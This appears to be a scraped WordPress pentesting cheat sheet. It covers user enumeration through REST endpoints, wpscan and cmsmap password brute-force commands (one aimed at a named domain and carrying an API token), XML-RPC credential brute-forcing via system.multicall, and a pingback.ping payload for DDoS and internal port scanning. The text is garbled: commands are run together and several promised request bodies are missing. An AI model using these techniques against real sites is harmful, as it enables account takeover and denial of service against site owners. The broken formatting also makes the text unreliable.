In wp-config.php you can find the root password of the database.
Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Enumeration
cmsmap-shttp://www.48pallmall.com-t2-a"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"wpscan--rua-eap--urlhttp://www.domain.com--api-tokenqNzF78w2S7s8QarQ2ISZbNR2Gq4FOmJV05HGjwvRMlM--passwords/usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt#Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)#You can try to bruteforce the admin user using wpscan with "-U admin"
Information Disclosure
Inside the Wordpress folder try to access:
/wp-json/wp/v2/users -- This could leak usernames
/wp-json/wp/v2/pages -- This could leak IP address
XML-RPC
If xml-rpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources.
To see if it is active try to access to /xmlrpc.php and send this request:
Check
Credentials Bruteforce
wp.getUserBlogs, wp.getCategories or metaWeblog.getUsersBlogs are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
The message "Incorrect username or password" inside a 200 code response should appear if the credentials aren't valid.
Also there is a faster way to brute-force credentials using system.multicall as you can try several credentials on the same request:
DDoS or port scanning
If you can find the method pingback.ping inside the list you can make the Wordpress send an arbitrary request to any host/port.
This can be used to ask thousands of Wordpress sites to access one location (so a DDoS is caused in that location) or you can use it to make Wordpress lo scan some internal network (you can indicate any port).
If you get faultCode with **a value greater then 0** (17), it means the port is open.
Take a look to the use of system.multicallin the previous section to learn how to abuse this method to cause DDoS.
wp-cron.php DoS
This file usually exists under the root of the Wordpress site: /wp-cron.php
When this file is accessed a "heavy" MySQL query is performed, so I could be used by attackers to cause a DoS.
Also, by default, the wp-cron.php is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
